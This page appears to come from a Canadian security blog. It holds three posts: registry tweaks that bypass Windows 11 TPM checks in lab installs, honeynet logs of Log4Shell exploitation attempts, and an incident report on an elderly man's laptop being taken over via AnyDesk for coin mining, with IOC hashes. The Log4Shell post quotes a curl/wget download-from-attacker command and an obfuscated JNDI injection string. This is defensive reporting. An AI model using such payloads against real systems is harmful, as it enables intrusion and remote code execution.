Thursday, December 23, 2021

Bypass security and TPM requirement on windows 11 for lab testing. .

 

  • For security and lab testing during windows 11 install, you have the ability to bypass some security requirement, during the install you will see a message stating, "This PC can't run Windows 11." Windows 11 setup blocked due to missing hardware requirements.  
  • When you see the above message, press Shift+F10 on your keyboard to launch a command prompt. Now type regedit and press enter to launch it. 


  • When the Registry Editor opens, navigate to: HKEY_LOCAL_MACHINE\SYSTEM\Setup, Right-click on the Setup key and select New > Key. 
  • When prompted to name the key, Type LabConfig and press enter. 
  • Next right-click on the LabConfig key and select New > DWORD (32-bit) value and create a value named BypassTPMCheck, and set its data to 1.  
  • Also create a DWORD 32 for (BypassSecureBootCheck) and set its value to 1. ( older machine that have no secure boot option, pre year 2010 ). 
  • For very OLD CPU's add this: \HKEY_LOCAL_MACHINE\SYSTEM\Setup\MoSetup then create DWORD 32 (AllowUpgradesWithUnsupportedTPMOrCPU) then set to 1,  would not install on a machine with less than a 2nd gen I5.


  • Now close all the new screens, press back, select the correct OS home/Pro etc. And you will no longer see the screen with the  "This PC can't run Windows 11." 



Posted by at No comments:

Monday, December 13, 2021

CVE-2021-44228 exploitation example Canada Cyber

 CVE-2021-44228 

CanadaCyber Honeynet logging data over last 3 days.

We see: 

Actions: "curl -s. RemoteActor:5874/CCyberPubIP:80||wget -q -O- , 

Most recent hits are coming up with obfuscation, 

RemoteActor HTTP/1.1 ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-"



Posted by at No comments:

Local Ottawa man laptop compromised by distributed Bitcoin miner.

 

Local Ottawa man laptop compromised by distributed Coin miner.

This all started with a phone call pretending to be the his local RRSPs representative, after some social engineering the hacker was able to get the 70-year-old man to install any desk software and provide the hacker remote access.  

A quick look in the download folder we can see:



Based on time stamps we can see that the hacker got in via legitimate version of AnyDesk. He then used locally saved banking information to create a bitcoin account, we also see evidence of banking transfer:


We later see the installation of variety of tools that allow the ability to the threat actor to install Coin mining software.

IOCs:

https://www.virustotal.com/gui/file/825729b8f0ce7215119a4035f6d0267a05466fd939f598f848341f3631a0a631

https://www.virustotal.com/gui/file/92b979d18973399b806f50bd4651445d7578f60c7a8b18e4ee761cd06de795e6

 

Other files of interest:

https://www.virustotal.com/gui/file/2294dbb4c42acca41c46ea5eebc3f5aa10ff1b0d200b4729fcefeda5321294ba/detection

https://www.virustotal.com/gui/file/930a03cb70737c49651fb96114fd3816aeb311d19cfadf312a35107924eca555

Posted by at No comments:
Subscribe to: Posts (Atom)